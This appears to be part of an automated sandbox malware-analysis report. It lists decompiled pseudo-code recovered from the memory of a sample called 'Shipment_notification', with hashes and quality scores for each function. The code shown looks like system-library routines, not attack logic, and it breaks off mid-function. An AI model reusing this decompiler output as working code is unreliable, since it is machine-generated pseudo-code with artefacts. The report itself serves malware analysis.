                                                                                				asm("sbb edi, edi");
                                                                                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                				_v8 = _t36;
                                                                                				asm("lock cmpxchg [ebx], ecx");
                                                                                				_t30 = 1;
                                                                                				if(1 != 1) {
                                                                                					while(1) {
                                                                                						_t21 = _t30 & 0x00000006;
                                                                                						_t16 = _t30;
                                                                                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                						asm("lock cmpxchg [edi], esi");
                                                                                						if(_t16 == _t30) {
                                                                                							break;
                                                                                						}
                                                                                						_t30 = _t16;
                                                                                					}
                                                                                					_t36 = _v8;
                                                                                					if(_t21 == 2) {
                                                                                						_t16 = E01B200C2(0x1bd8608, 0, _t28);
                                                                                					}
                                                                                				}
                                                                                				if(_t36 != 0) {
                                                                                					_t16 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                				}
                                                                                				return _t16;
                                                                                			}











                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67650ac358e4e2e007e25af04b0cae36f37d4e51092114b7772bd6229d2b7db1
                                                                                • Instruction ID: c117e5a380b40652b334eed968c7a25cbc802b87d016a56fbc302dc1d4736012
                                                                                • Opcode Fuzzy Hash: 67650ac358e4e2e007e25af04b0cae36f37d4e51092114b7772bd6229d2b7db1
                                                                                • Instruction Fuzzy Hash: 1C116B333011109BCB1E9A699EC1A2B7766EBC9730B6502B9ED16D7380DB31AC02C6D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E01AE9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t37;
                                                                                				intOrPtr _t41;
                                                                                				intOrPtr* _t46;
                                                                                				void* _t48;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr* _t60;
                                                                                				void* _t61;
                                                                                				intOrPtr _t62;
                                                                                				intOrPtr _t65;
                                                                                				void* _t66;
                                                                                				void* _t68;
                                                                                
                                                                                				_push(0xc);
                                                                                				_push(0x1bbf708);
                                                                                				E01B3D08C(__ebx, __edi, __esi);
                                                                                				_t65 = __ecx;
                                                                                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                				if( *(__ecx + 0x24) != 0) {
                                                                                					_push( *(__ecx + 0x24));
                                                                                					E01B295D0();
                                                                                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                				}
                                                                                				L6();
                                                                                				L6();
                                                                                				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                				E01B295D0();
                                                                                				_t33 =  *0x1bd84c4; // 0x0
                                                                                				L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                				_t37 =  *0x1bd84c4; // 0x0
                                                                                				L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                				_t41 =  *0x1bd84c4; // 0x0
                                                                                				E01B02280(L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1bd86b4);
                                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                				_t46 = _t65 + 0xe8;
                                                                                				_t62 =  *_t46;
                                                                                				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                					_t61 = 3;
                                                                                					asm("int 0x29");
                                                                                					_push(_t65);
                                                                                					_t66 = _t61;
                                                                                					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                					_push( *_t23);
                                                                                					E01B295D0();
                                                                                					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                					_push( *_t24);
                                                                                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                					_t48 = E01B295D0();
                                                                                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                					return _t48;
                                                                                				} else {
                                                                                					 *_t60 = _t62;
                                                                                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                					 *(_t68 - 4) = 0xfffffffe;
                                                                                					E01AE9325();
                                                                                					_t50 =  *0x1bd84c4; // 0x0
                                                                                					return E01B3D0D1(L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                				}
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6e7ebb6e2667314847b14797e1e54b6fbd461842290bab05862fd845defb2c16
                                                                                • Instruction ID: 0ac70e1396bd2f1a62b17cffe90c59b2488db8021fff81c30e38882582f26325
                                                                                • Opcode Fuzzy Hash: 6e7ebb6e2667314847b14797e1e54b6fbd461842290bab05862fd845defb2c16
                                                                                • Instruction Fuzzy Hash: 89216D71141602DFCB2AEF68CA54F1AB7F9FF18708F0445ACE049876A2DB34E941CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E01B74257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr* _t27;
                                                                                				intOrPtr* _t30;
                                                                                				intOrPtr* _t31;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr* _t34;
                                                                                				intOrPtr* _t35;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				void* _t39;
                                                                                				void* _t43;
                                                                                
                                                                                				_t39 = __eflags;
                                                                                				_t35 = __edi;
                                                                                				_push(8);
                                                                                				_push(0x1bc08d0);
                                                                                				E01B3D08C(__ebx, __edi, __esi);
                                                                                				_t37 = __ecx;
                                                                                				E01B741E8(__ebx, __edi, __ecx, _t39);
                                                                                				E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                				_t18 = _t37 + 8;
                                                                                				_t33 =  *_t18;
                                                                                				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                					L8:
                                                                                					_push(3);
                                                                                					asm("int 0x29");
                                                                                				} else {
                                                                                					 *_t27 = _t33;
                                                                                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                					_t35 = 0x1bd87e4;
                                                                                					_t18 =  *0x1bd87e0; // 0x0
                                                                                					while(_t18 != 0) {
                                                                                						_t43 = _t18 -  *0x1bd5cd0; // 0xffffffff
                                                                                						if(_t43 >= 0) {
                                                                                							_t31 =  *0x1bd87e4; // 0x0
                                                                                							_t18 =  *_t31;
                                                                                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                								goto L8;
                                                                                							} else {
                                                                                								 *0x1bd87e4 = _t18;
                                                                                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                								L01AE7055(_t31 + 0xfffffff8);
                                                                                								_t24 =  *0x1bd87e0; // 0x0
                                                                                								_t18 = _t24 - 1;
                                                                                								 *0x1bd87e0 = _t18;
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						goto L9;
                                                                                					}
                                                                                				}
                                                                                				L9:
                                                                                				__eflags =  *0x1bd5cd0;
                                                                                				if( *0x1bd5cd0 <= 0) {
                                                                                					L01AE7055(_t37);
                                                                                				} else {
                                                                                					_t30 = _t37 + 8;
                                                                                					_t34 =  *0x1bd87e8; // 0x0
                                                                                					__eflags =  *_t34 - _t35;
                                                                                					if( *_t34 != _t35) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						 *_t30 = _t35;
                                                                                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                						 *_t34 = _t30;
                                                                                						 *0x1bd87e8 = _t30;
                                                                                						 *0x1bd87e0 = _t18 + 1;
                                                                                					}
                                                                                				}
                                                                                				 *(_t38 - 4) = 0xfffffffe;
                                                                                				return E01B3D0D1(L01B74320());
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc8898331360f61eb648590ca3d255c647a9c70e3ff4a5982aaf4e4ba5fc830d
                                                                                • Instruction ID: 728a4f52bc15415cbac1230f2e7c7312b29345a993387bcab46eae8ebf5c0bf4
                                                                                • Opcode Fuzzy Hash: fc8898331360f61eb648590ca3d255c647a9c70e3ff4a5982aaf4e4ba5fc830d
                                                                                • Instruction Fuzzy Hash: 1D218E70612602CFCB2EEF68D150A14BBF1FB85317B5682EED1298B265E731D465CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
                                                                                			E01B12397(intOrPtr _a4) {
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t11;
                                                                                				void* _t19;
                                                                                				void* _t25;
                                                                                				void* _t26;
                                                                                				intOrPtr _t27;
                                                                                				void* _t28;
                                                                                				void* _t29;
                                                                                
                                                                                				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                                				if( *0x1bd848c != 0) {
                                                                                					L01B0FAD0(0x1bd8610);
                                                                                					if( *0x1bd848c == 0) {
                                                                                						E01B0FA00(0x1bd8610, _t19, _t27, 0x1bd8610);
                                                                                						goto L1;
                                                                                					} else {
                                                                                						_push(0);
                                                                                						_push(_a4);
                                                                                						_t26 = 4;
                                                                                						_t29 = E01B12581(0x1bd8610, 0x1ac50a0, _t26, _t27, _t28);
                                                                                						E01B0FA00(0x1bd8610, 0x1ac50a0, _t27, 0x1bd8610);
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_t11 =  *0x1bd8614; // 0x0
                                                                                					if(_t11 == 0) {
                                                                                						_t11 = E01B24886(0x1ac1088, 1, 0x1bd8614);
                                                                                					}
                                                                                					_push(0);
                                                                                					_push(_a4);
                                                                                					_t25 = 4;
                                                                                					_t29 = E01B12581(0x1bd8610, (_t11 << 4) + 0x1ac5070, _t25, _t27, _t28);
                                                                                				}
                                                                                				if(_t29 != 0) {
                                                                                					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                                					 *((char*)(_t29 + 0x40)) = 0;
                                                                                				}
                                                                                				return _t29;
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6a4e4151d0a38fefe16cfb2880dfe1b1773dee0fd96fc6ddf81c2480677c600f
                                                                                • Instruction ID: af336ffecef6325fd5096208443bbdc93059bd9981ec67686671202225d3b421
                                                                                • Opcode Fuzzy Hash: 6a4e4151d0a38fefe16cfb2880dfe1b1773dee0fd96fc6ddf81c2480677c600f
                                                                                • Instruction Fuzzy Hash: 82112B317003016BE73D9629BCC0F25B6D8FB60621F6545EEF602D7295D7B0E8418754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E01B646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                				signed short* _v8;
                                                                                				unsigned int _v12;
                                                                                				intOrPtr _v16;
                                                                                				signed int _t22;
                                                                                				signed char _t23;
                                                                                				short _t32;
                                                                                				void* _t38;
                                                                                				char* _t40;
                                                                                
                                                                                				_v12 = __edx;
                                                                                				_t29 = 0;
                                                                                				_v8 = __ecx;
                                                                                				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                				_t38 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                				if(_t38 != 0) {
                                                                                					_t40 = _a4;
                                                                                					 *_t40 = 1;
                                                                                					E01B2F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                					_t22 = _v12 >> 1;
                                                                                					_t32 = 0x2e;
                                                                                					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                					_t23 = E01B1D268(_t38, 1);
                                                                                					asm("sbb al, al");
                                                                                					 *_t40 =  ~_t23 + 1;
                                                                                					L01B077F0(_v16, 0, _t38);
                                                                                				} else {
                                                                                					 *_a4 = 0;
                                                                                					_t29 = 0xc0000017;
                                                                                				}
                                                                                				return _t29;
                                                                                			}












                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                • Instruction ID: 18c39cb8679f569a8f23ddcc710ab026a94948d328ba85d45e4466b392da0f94
                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                • Instruction Fuzzy Hash: 7C11E572504608BBCB0A9F5CD9808BEBBB9EFA5310F1080AEF984C7351DB359D55D7A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 42%
                                                                                			E01AEC962(char __ecx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t19;
                                                                                				char _t22;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                				char _t32;
                                                                                				char _t34;
                                                                                				void* _t35;
                                                                                				void* _t37;
                                                                                				intOrPtr* _t38;
                                                                                				signed int _t39;
                                                                                
                                                                                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                				_v8 =  *0x1bdd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                				_t34 = __ecx;
                                                                                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                					_t26 = 0;
                                                                                					E01AFEEF0(0x1bd70a0);
                                                                                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                					if(L01B6F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                						L9:
                                                                                						E01AFEB70(_t29, 0x1bd70a0);
                                                                                						_t19 = _t26;
                                                                                						L2:
                                                                                						_pop(_t35);
                                                                                						_pop(_t37);
                                                                                						_pop(_t27);
                                                                                						return L01B2B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                					}
                                                                                					_t29 = _t34;
                                                                                					_t26 = E01B6F1FC(_t34, _t32);
                                                                                					if(_t26 < 0) {
                                                                                						goto L9;
                                                                                					}
                                                                                					_t38 =  *0x1bd70c0; // 0x0
                                                                                					while(_t38 != 0x1bd70c0) {
                                                                                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                						_t38 =  *_t38;
                                                                                						_v12 = _t22;
                                                                                						if(_t22 != 0) {
                                                                                							_t29 = _t22;
                                                                                							 *0x1bdb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                							_v12();
                                                                                						}
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                				_t19 = 0;
                                                                                				goto L2;
                                                                                			}



















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b17a0bb21eb73fa23b9d523ef852364d3317e63b9ac172c5cefea2242ea4432
                                                                                • Instruction ID: 62ae9d52ced2b69460cd67e54264316421726461a2cfb60a3562e1567d24da4e
                                                                                • Opcode Fuzzy Hash: 0b17a0bb21eb73fa23b9d523ef852364d3317e63b9ac172c5cefea2242ea4432
                                                                                • Instruction Fuzzy Hash: D31102313006469BCB6DAF2DD894A6A77F5FB88214B8001ADFD45836A0EF20EC10C7D1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E01B237F5(void* __ecx, intOrPtr* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed char _t6;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t20;
                                                                                				intOrPtr* _t27;
                                                                                				void* _t28;
                                                                                				intOrPtr* _t29;
                                                                                
                                                                                				_t27 = __edx;
                                                                                				_t28 = __ecx;
                                                                                				if(__edx == 0) {
                                                                                					E01B02280(_t6, 0x1bd8550);
                                                                                				}
                                                                                				_t29 = E01B2387E(_t28);
                                                                                				if(_t29 == 0) {
                                                                                					L6:
                                                                                					if(_t27 == 0) {
                                                                                						E01AFFFB0(0x1bd8550, _t27, 0x1bd8550);
                                                                                					}
                                                                                					if(_t29 == 0) {
                                                                                						return 0xc0000225;
                                                                                					} else {
                                                                                						if(_t27 != 0) {
                                                                                							goto L14;
                                                                                						}
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                                						goto L11;
                                                                                					}
                                                                                				} else {
                                                                                					_t13 =  *_t29;
                                                                                					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                                						L13:
                                                                                						_push(3);
                                                                                						asm("int 0x29");
                                                                                						L14:
                                                                                						 *_t27 = _t29;
                                                                                						L11:
                                                                                						return 0;
                                                                                					}
                                                                                					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                                					if( *_t20 != _t29) {
                                                                                						goto L13;
                                                                                					}
                                                                                					 *_t20 = _t13;
                                                                                					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                                					asm("btr eax, ecx");
                                                                                					goto L6;
                                                                                				}
                                                                                			}












                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d54b77f1f3a05c34bc8bdf1c734fd4956b736bf1b71e36a9aebfbb7ffa8f1e8
                                                                                • Instruction ID: bb17b6b2ba83210effa078dee4e346ac20cf70763648cbda2d95683116e04832
                                                                                • Opcode Fuzzy Hash: 7d54b77f1f3a05c34bc8bdf1c734fd4956b736bf1b71e36a9aebfbb7ffa8f1e8
                                                                                • Instruction Fuzzy Hash: 7201C4729016219BC33F8A5D9940A26BBE6FF8DA5071540E9E94D8F225DB78D845CBC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B1002D() {
                                                                                				void* _t11;
                                                                                				char* _t14;
                                                                                				signed char* _t16;
                                                                                				char* _t27;
                                                                                				signed char* _t29;
                                                                                
                                                                                				_t11 = E01B07D50();
                                                                                				_t27 = 0x7ffe0384;
                                                                                				if(_t11 != 0) {
                                                                                					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                				} else {
                                                                                					_t14 = 0x7ffe0384;
                                                                                				}
                                                                                				_t29 = 0x7ffe0385;
                                                                                				if( *_t14 != 0) {
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t16 = 0x7ffe0385;
                                                                                					} else {
                                                                                						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                					}
                                                                                					if(( *_t16 & 0x00000040) != 0) {
                                                                                						goto L18;
                                                                                					} else {
                                                                                						goto L3;
                                                                                					}
                                                                                				} else {
                                                                                					L3:
                                                                                					if(E01B07D50() != 0) {
                                                                                						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                					}
                                                                                					if( *_t27 != 0) {
                                                                                						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                                							goto L5;
                                                                                						}
                                                                                						if(E01B07D50() != 0) {
                                                                                							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                						}
                                                                                						if(( *_t29 & 0x00000020) == 0) {
                                                                                							goto L5;
                                                                                						}
                                                                                						L18:
                                                                                						return 1;
                                                                                					} else {
                                                                                						L5:
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                			}









                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                • Instruction ID: 89c7dce598ee312bace47afb78fe21e1e294d84854d4a6382d12075e706935f4
                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                • Instruction Fuzzy Hash: 5E11D6726056858FE76BA72CC948B357BD5EF45754F0A01E0EE44C7693FB28D8C1C260
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E01AE9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _t51;
                                                                                				intOrPtr _t59;
                                                                                				signed int _t64;
                                                                                				signed int _t67;
                                                                                				signed int* _t71;
                                                                                				signed int _t74;
                                                                                				signed int _t77;
                                                                                				signed int _t82;
                                                                                				intOrPtr* _t84;
                                                                                				void* _t85;
                                                                                				intOrPtr* _t87;
                                                                                				void* _t94;
                                                                                				signed int _t95;
                                                                                				intOrPtr* _t97;
                                                                                				signed int _t99;
                                                                                				signed int _t102;
                                                                                				void* _t104;
                                                                                
                                                                                				_push(__ebx);
                                                                                				_push(__esi);
                                                                                				_push(__edi);
                                                                                				_t97 = __ecx;
                                                                                				_t102 =  *(__ecx + 0x14);
                                                                                				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                					_t102 = _t102 | 0x000007d0;
                                                                                				}
                                                                                				_t48 =  *[fs:0x30];
                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                					_t102 = _t102 & 0xff000000;
                                                                                				}
                                                                                				_t80 = 0x1bd85ec;
                                                                                				E01B02280(_t48, 0x1bd85ec);
                                                                                				_t51 =  *_t97 + 8;
                                                                                				if( *_t51 != 0) {
                                                                                					L6:
                                                                                					return E01AFFFB0(_t80, _t97, _t80);
                                                                                				} else {
                                                                                					 *(_t97 + 0x14) = _t102;
                                                                                					_t84 =  *0x1bd538c; // 0x771a6828
                                                                                					if( *_t84 != 0x1bd5388) {
                                                                                						_t85 = 3;
                                                                                						asm("int 0x29");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						_push(0x2c);
                                                                                						_push(0x1bbf6e8);
                                                                                						E01B3D0E8(0x1bd85ec, _t97, _t102);
                                                                                						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                						_t99 =  *(_t104 + 8);
                                                                                						__eflags = _t99;
                                                                                						if(_t99 == 0) {
                                                                                							L13:
                                                                                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                							if(__eflags == 0) {
                                                                                								E01BB88F5(_t80, _t85, 0x1bd5388, _t99, _t102, __eflags);
                                                                                							}
                                                                                						} else {
                                                                                							__eflags = _t99 -  *0x1bd86c0; // 0x15807b0
                                                                                							if(__eflags == 0) {
                                                                                								goto L13;
                                                                                							} else {
                                                                                								__eflags = _t99 -  *0x1bd86b8; // 0x0
                                                                                								if(__eflags == 0) {
                                                                                									goto L13;
                                                                                								} else {
                                                                                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                									__eflags =  *((char*)(_t59 + 0x28));
                                                                                									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                										E01B02280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                										if(__eflags != 0) {
                                                                                											E01BB88F5(0x1bd85ec, _t85, 0x1bd5388, _t99, _t102, __eflags);
                                                                                										} else {
                                                                                											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                												_push(_t99);
                                                                                												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                												E01B2AFD0();
                                                                                											}
                                                                                											while(1) {
                                                                                												_t71 = _t99 + 8;
                                                                                												 *(_t104 - 0x2c) = _t71;
                                                                                												_t80 =  *_t71;
                                                                                												_t95 = _t71[1];
                                                                                												 *(_t104 - 0x28) = _t80;
                                                                                												 *(_t104 - 0x24) = _t95;
                                                                                												while(1) {
                                                                                													L19:
                                                                                													__eflags = _t95;
                                                                                													if(_t95 == 0) {
                                                                                														break;
                                                                                													}
                                                                                													_t102 = _t80;
                                                                                													 *(_t104 - 0x30) = _t95;
                                                                                													 *(_t104 - 0x24) = _t95 - 1;
                                                                                													asm("lock cmpxchg8b [edi]");
                                                                                													_t80 = _t102;
                                                                                													 *(_t104 - 0x28) = _t80;
                                                                                													 *(_t104 - 0x24) = _t95;
                                                                                													__eflags = _t80 - _t102;
                                                                                													_t99 =  *(_t104 + 8);
                                                                                													if(_t80 != _t102) {
                                                                                														continue;
                                                                                													} else {
                                                                                														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                															continue;
                                                                                														} else {
                                                                                															__eflags = _t95;
                                                                                															if(_t95 != 0) {
                                                                                																_t74 = 0;
                                                                                																 *(_t104 - 0x34) = 0;
                                                                                																_t102 = 0;
                                                                                																__eflags = 0;
                                                                                																while(1) {
                                                                                																	 *(_t104 - 0x3c) = _t102;
                                                                                																	__eflags = _t102 - 3;
                                                                                																	if(_t102 >= 3) {
                                                                                																		break;
                                                                                																	}
                                                                                																	__eflags = _t74;
                                                                                																	if(_t74 != 0) {
                                                                                																		L49:
                                                                                																		_t102 =  *_t74;
                                                                                																		__eflags = _t102;
                                                                                																		if(_t102 != 0) {
                                                                                																			_t102 =  *(_t102 + 4);
                                                                                																			__eflags = _t102;
                                                                                																			if(_t102 != 0) {
                                                                                																				 *0x1bdb1e0(_t74, _t99);
                                                                                																				 *_t102();
                                                                                																			}
                                                                                																		}
                                                                                																		do {
                                                                                																			_t71 = _t99 + 8;
                                                                                																			 *(_t104 - 0x2c) = _t71;
                                                                                																			_t80 =  *_t71;
                                                                                																			_t95 = _t71[1];
                                                                                																			 *(_t104 - 0x28) = _t80;
                                                                                																			 *(_t104 - 0x24) = _t95;
                                                                                																			goto L19;
                                                                                																		} while (_t74 == 0);
                                                                                																		goto L49;
                                                                                																	} else {
                                                                                																		_t82 = 0;
                                                                                																		__eflags = 0;
                                                                                																		while(1) {
                                                                                																			 *(_t104 - 0x38) = _t82;
                                                                                																			__eflags = _t82 -  *0x1bd84c0;
                                                                                																			if(_t82 >=  *0x1bd84c0) {
                                                                                																				break;
                                                                                																			}
                                                                                																			__eflags = _t74;
                                                                                																			if(_t74 == 0) {
